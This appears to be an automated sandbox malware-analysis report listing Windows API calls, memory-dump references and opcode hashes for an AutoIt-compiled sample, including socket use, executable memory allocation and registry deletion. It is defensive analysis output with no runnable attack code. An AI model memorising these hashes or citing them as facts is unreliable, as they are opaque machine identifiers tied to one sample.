• Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
Similarity
• API ID: MessageSend$DestroyWindow
• String ID: msctls_updown32
• API String ID: 4014797782-2298589950
• Opcode ID: f4fd425fa88397e4aa4152c21c2e869da6ec9af63c8dfd49009f8fe72167fd4a
• Instruction ID: b3215b37032c8b09367419cbf72873a2122ee39fa0fe695bb3c1ac49e8d10a77
• Opcode Fuzzy Hash: f4fd425fa88397e4aa4152c21c2e869da6ec9af63c8dfd49009f8fe72167fd4a
• Instruction Fuzzy Hash: AE216BB1204209AFDB10DF68DCD1DA677EDEB593A4B144059FA019B3A1CB31EC419BA0
APIs
• SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00916D3B
• SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00916D4B
• MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00916D70
Strings
Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
• Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
Similarity
• API ID: MessageSend$MoveWindow
• String ID: Listbox
• API String ID: 3315199576-2633736733
• Opcode ID: c357bac7251228daf800153668cda026d847131baa5b90f4ffda7be0362b5ce0
• Instruction ID: cc4aac9f0ba495eb21821ade53d2299156c7353a62d93a88bc23f17640de6aca
• Opcode Fuzzy Hash: c357bac7251228daf800153668cda026d847131baa5b90f4ffda7be0362b5ce0
• Instruction Fuzzy Hash: F2218032B1411CBFEF118F54DC45EEB3BBEEB89764F418128FA459B1A0C6719C9197A0
APIs
• SetErrorMode.KERNEL32(00000001), ref: 008FAC54
• GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 008FACA8
• SetErrorMode.KERNEL32(00000000,00000001,00000000,0091F910), ref: 008FACFF
Strings
Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
• Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
Similarity
• API ID: ErrorMode$InformationVolume
• String ID: %lu
• API String ID: 2507767853-685833217
• Opcode ID: 13751327417a293044b8d180ee7dbe986e772c7e532feb8ffd29e95432694166
• Instruction ID: 6e4f1025f7b8b77afd0860c4fc3ab512bc12de6058014029df095d63310d4180
• Opcode Fuzzy Hash: 13751327417a293044b8d180ee7dbe986e772c7e532feb8ffd29e95432694166
• Instruction Fuzzy Hash: 11217170A0010DAFCB10EF69C985DEE7BB8FF89314B044069F909EB251DA31EA41DB22
APIs
  • Part of subcall function 00897DE1: _memmove.LIBCMT ref: 00897E22
• _wprintf.LIBCMT ref: 008EFA17
  • Part of subcall function 00897BCC: _memmove.LIBCMT ref: 00897C06
Strings
Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
• Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
Similarity
• API ID: _memmove$_wprintf
• String ID: Error: $%s (%d) : ==> %s: %s %s$^ ERROR
• API String ID: 346992586-1644414935
• Opcode ID: 5eb527562e98e9691b94c4ecf8243c6bbf64aa8d231d68cf4a23e28179aad567
• Instruction ID: 7fb8527a1b24281163c6daf0fd6555d450a8f4df4d57542a3b336641e2d052c7
• Opcode Fuzzy Hash: 5eb527562e98e9691b94c4ecf8243c6bbf64aa8d231d68cf4a23e28179aad567
• Instruction Fuzzy Hash: F121FA3281410D9ACF09FBA8DD92DFEB774FF15315F640165E516B20A2AF212F19CB62
APIs
• SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00917772
• SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00917787
• SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00917794
Strings
Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
• Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
Similarity
• API ID: MessageSend
• String ID: msctls_trackbar32
• API String ID: 3850602802-1010561917
• Opcode ID: 10f5c3c9aca5ff8b130b618a6b867ae3e8d7f721f774fb1329ebdc45f842661f
• Instruction ID: 37a0da62a72e118a4359617a2e69241a34d956935d5be26c6dc04e4d8102c2b2
• Opcode Fuzzy Hash: 10f5c3c9aca5ff8b130b618a6b867ae3e8d7f721f774fb1329ebdc45f842661f
• Instruction Fuzzy Hash: A011C172254209BAEF209FA5CC05FEB77ADEF88B64F114528FA45A60D0D672E851DB20
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00894BD0,?,00894DEF,?,009552F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00894C11
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00894C23
Strings
Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
• Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: Wow64DisableWow64FsRedirection$kernel32.dll
• API String ID: 2574300362-3689287502
• Opcode ID: b0c7ddb3200a3f0f07b2176e01eea4bb3d9862b23f2476b88a41e7de7d11b282
• Instruction ID: c8dc1579119f156d2017a9929d19f40196a252635ed74e65ddf2e79defed7325
• Opcode Fuzzy Hash: b0c7ddb3200a3f0f07b2176e01eea4bb3d9862b23f2476b88a41e7de7d11b282
• Instruction Fuzzy Hash: C5D0C230618717DFCB206F70D828A46B6D5FF08346B05CC39A486C2150E6B0C480CA10
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00894B83), ref: 00894C44
• GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00894C56
Strings
Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
• Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: Wow64RevertWow64FsRedirection$kernel32.dll
• API String ID: 2574300362-1355242751
• Opcode ID: e97484f225c736769862b7505c239f6063c272d14dec0c657bcdaf8727b3788a
• Instruction ID: fa8bb1d0ea0574527089ac84d9454eb58e4069e199e0db4a787316a67d072192
• Opcode Fuzzy Hash: e97484f225c736769862b7505c239f6063c272d14dec0c657bcdaf8727b3788a
• Instruction Fuzzy Hash: DAD0C73062CB17DFCB20AF31D818A8A72E4FF01348B15C83AA49AC6260E670C880CA10
APIs
• LoadLibraryA.KERNEL32(advapi32.dll,?,0090FD01), ref: 00910DF5
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00910E07
Strings
Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
• Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: RegDeleteKeyExW$advapi32.dll
• API String ID: 2574300362-4033151799
• Opcode ID: 7981a5755cab24e6fa46c13e824e06ff1aa119d0463ffa06373ae94ac569ab5d
• Instruction ID: a261e709d0c59c869153e8bdbdf9a60a7bcb13a5f2b6105100ccb073def714d8
• Opcode Fuzzy Hash: 7981a5755cab24e6fa46c13e824e06ff1aa119d0463ffa06373ae94ac569ab5d
• Instruction Fuzzy Hash: 87D0177072472ADFD7209F76C808AC77AE9AF84356F21CC3EA886D2150E6B1D8D0CA50
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,00000001,00908CF4,?,0091F910), ref: 009090EE
• GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00909100
Strings
Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
• Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetModuleHandleExW$kernel32.dll
• API String ID: 2574300362-199464113
• Opcode ID: 0304aaf5381e3652564f1bced5bb6dceaff42033340e4c152eda7d9e06642f88
• Instruction ID: c3f07660307344ecf2055934deb6ccec58212a77a7ac0b8637d2afe74c163fed
• Opcode Fuzzy Hash: 0304aaf5381e3652564f1bced5bb6dceaff42033340e4c152eda7d9e06642f88
• Instruction Fuzzy Hash: 19D0173476C717DFDB209F31D82868676E8AF45355B12C83AD48AD6591EAB4C880DA90
Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
• Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6f58db5e32dc85395341987444b32f58742f5736f19a9db7fb460b71996aef53
• Instruction ID: 3e26d7673c01462bce7177eaa92a77cad21cfe9f8330771e6604217ff0c4a95b
• Opcode Fuzzy Hash: 6f58db5e32dc85395341987444b32f58742f5736f19a9db7fb460b71996aef53
• Instruction Fuzzy Hash: 3BC18174A0425AEFDB14CF95C884EAEBBB5FF49304B148598E805EB351D730ED41DB90
APIs
• CharLowerBuffW.USER32(?,?), ref: 0090E0BE
• CharLowerBuffW.USER32(?,?), ref: 0090E101
  • Part of subcall function 0090D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0090D7C5
• VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0090E301
• _memmove.LIBCMT ref: 0090E314
Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
• Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
Similarity
• API ID: BuffCharLower$AllocVirtual_memmove
• String ID:
• API String ID: 3659485706-0
• Opcode ID: 4b8698efe61f3eb900545004f33306f0445e2b018a4b179367255595c7df4895
• Instruction ID: 2bb677106463d2ab387c5550bcc5a8b278487371600aa42659855000f44f4765
• Opcode Fuzzy Hash: 4b8698efe61f3eb900545004f33306f0445e2b018a4b179367255595c7df4895
• Instruction Fuzzy Hash: ADC136716083019FC714DF28C490A6ABBE4FF89714F18896EF899DB391D731E946CB82
                                                                        APIs
                                                                        • CoInitialize.OLE32(00000000), ref: 009080C3
                                                                        • CoUninitialize.OLE32 ref: 009080CE
                                                                          • Part of subcall function 008ED56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 008ED5D4
                                                                        • VariantInit.OLEAUT32(?), ref: 009080D9
                                                                        • VariantClear.OLEAUT32(?), ref: 009083AA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                        • String ID:
                                                                        • API String ID: 780911581-0
                                                                        • Opcode ID: bb5bb57169a795a49196ef9e64d25833ce749bb9b637371385cd816a86459767
                                                                        • Instruction ID: 9f7ddf2add1496a75803c43e9df923fa0d5837bc6320726ebb99b63068871a25
                                                                        • Opcode Fuzzy Hash: bb5bb57169a795a49196ef9e64d25833ce749bb9b637371385cd816a86459767
                                                                        • Instruction Fuzzy Hash: 0BA115756047019FCB10EF58C881A2AB7E8FF89764F18445CF99AAB3A1DB34ED05CB42
                                                                        APIs
                                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00922C7C,?), ref: 008E76EA
                                                                        • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00922C7C,?), ref: 008E7702
                                                                        • CLSIDFromProgID.OLE32(?,?,00000000,0091FB80,000000FF,?,00000000,00000800,00000000,?,00922C7C,?), ref: 008E7727
                                                                        • _memcmp.LIBCMT ref: 008E7748
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: FromProg$FreeTask_memcmp
                                                                        • String ID:
                                                                        • API String ID: 314563124-0
                                                                        • Opcode ID: a51b9e922bf09418d6bbd9056315397461aa88f873354c6dc4cbfcafcefc4743
                                                                        • Instruction ID: a6b6edd5b8e7580f2a069984d49ac09fa0037be2b3606f6424d5586084a54f78
                                                                        • Opcode Fuzzy Hash: a51b9e922bf09418d6bbd9056315397461aa88f873354c6dc4cbfcafcefc4743
                                                                        • Instruction Fuzzy Hash: FD81FC75A10109EFCB04DFA5C984EEEB7B9FF89315F204598E506EB250DB71AE06CB60
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$AllocClearCopyInitString
                                                                        • String ID:
                                                                        • API String ID: 2808897238-0
                                                                        • Opcode ID: af5ad401ad6b045bb08d59a6b2183eb68100a63e1054971b1ff0ee572f98d398
                                                                        • Instruction ID: 7576c6e650623fe6a4a4462d03440a9dd8d3a73e926ff613c6ba42eaf7e513b9
                                                                        • Opcode Fuzzy Hash: af5ad401ad6b045bb08d59a6b2183eb68100a63e1054971b1ff0ee572f98d398
                                                                        • Instruction Fuzzy Hash: D051F934B003459EDF20AF6AD89167AB7E5FF26390F24D82FE586D7291FA30D8508702
                                                                        APIs
                                                                        • GetWindowRect.USER32(014CE318,?), ref: 00919863
                                                                        • ScreenToClient.USER32(00000002,00000002), ref: 00919896
                                                                        • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00919903
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ClientMoveRectScreen
                                                                        • String ID:
                                                                        • API String ID: 3880355969-0
                                                                        • Opcode ID: 49e888b82eaef44180182a2a93cac0114ba584a62b3159edd4c9f0e8f229729e
                                                                        • Instruction ID: 0281b21f284f3eff10528ee6cff3b3907bdaf65b47f9401acf6f83ea9648fe40
                                                                        • Opcode Fuzzy Hash: 49e888b82eaef44180182a2a93cac0114ba584a62b3159edd4c9f0e8f229729e
                                                                        • Instruction Fuzzy Hash: D8513F34A00209AFDF14DF54C894AEE7BB9FF46360F148159F9559B2A0D730AD81DB90
                                                                        APIs
                                                                        • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 008E9AD2
                                                                        • __itow.LIBCMT ref: 008E9B03
                                                                          • Part of subcall function 008E9D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 008E9DBE
                                                                        • SendMessageW.USER32(?,0000110A,00000001,?), ref: 008E9B6C
                                                                        • __itow.LIBCMT ref: 008E9BC3
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$__itow
                                                                        • String ID:
                                                                        • API String ID: 3379773720-0
                                                                        • Opcode ID: 6fc2024ffc0f5599ac09c147e00a6e7221a7438cc7447df54a480f36f83a2153
                                                                        • Instruction ID: 9741459633babeaf3d71e7a3867e0e2876ea4540c4806a0151fa8fe56cba3482
                                                                        • Opcode Fuzzy Hash: 6fc2024ffc0f5599ac09c147e00a6e7221a7438cc7447df54a480f36f83a2153
                                                                        • Instruction Fuzzy Hash: 5141C070A0025CABDF21EF59D845BEE7BB9FF85724F040029F945E7291DBB09A44CB62
                                                                        APIs
                                                                        • socket.WSOCK32(00000002,00000002,00000011), ref: 009069D1
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 009069E1
                                                                          • Part of subcall function 00899837: __itow.LIBCMT ref: 00899862
                                                                        • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00906A45
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00906A51
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$__itowsocket
                                                                        • String ID:
                                                                        • API String ID: 2099362015-0
                                                                        • Opcode ID: 6f037fa1ac271a8cc6f966dba37262323a0f9c4512fd1b47ce951d588e329253
                                                                        • Instruction ID: 16b25a2961ecaac49469bb450b98d01cdad0c46ce269e2a98847469198c377a1
                                                                        • Opcode Fuzzy Hash: 6f037fa1ac271a8cc6f966dba37262323a0f9c4512fd1b47ce951d588e329253
                                                                        • Instruction Fuzzy Hash: 38415375740200AFDB50BF6CCC86F7A76E8EB15B14F08845CFA59EB2D2DA759D008792
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: __write$__getbuf__getptd_noexit__lseeki64
                                                                        • String ID:
                                                                        • API String ID: 4182129353-0
                                                                        • Opcode ID: 067c51e6a15dabab23aed4b9a08e48c06f3d1f0e409bb21551ff3cede98f659f
                                                                        • Instruction ID: 655ce587e85a87145177b63da614e00d63b194735d1aaa5b3e5043c6f8e57867
                                                                        • Opcode Fuzzy Hash: 067c51e6a15dabab23aed4b9a08e48c06f3d1f0e409bb21551ff3cede98f659f
                                                                        • Instruction Fuzzy Hash: 1B4190B1500B059FD72C9F2DC896AFA77E4FF45324B14861DE4AAC63D1EB34E8408B52
                                                                        APIs
                                                                        • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0091F910), ref: 009064A7
                                                                        • _strlen.LIBCMT ref: 009064D9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: _strlen
                                                                        • String ID:
                                                                        • API String ID: 4218353326-0
                                                                        • Opcode ID: 71fb0abe431351a15c7128b345e550d61bb65abaa547746fe7e8f3504b938132
                                                                        • Instruction ID: d1013bfb162d317984cadbfdb3064350761a7d35ffa57119ec7e7535a0253ab3
                                                                        • Opcode Fuzzy Hash: 71fb0abe431351a15c7128b345e550d61bb65abaa547746fe7e8f3504b938132
                                                                        • Instruction Fuzzy Hash: 52415E31A00114AFCB14EBA8DC96EAEB7A9FF45310F148159F91ADB2D2DB34AD10CB51
                                                                        APIs
                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 008FB89E
                                                                        • GetLastError.KERNEL32(?,00000000), ref: 008FB8C4
                                                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 008FB8E9
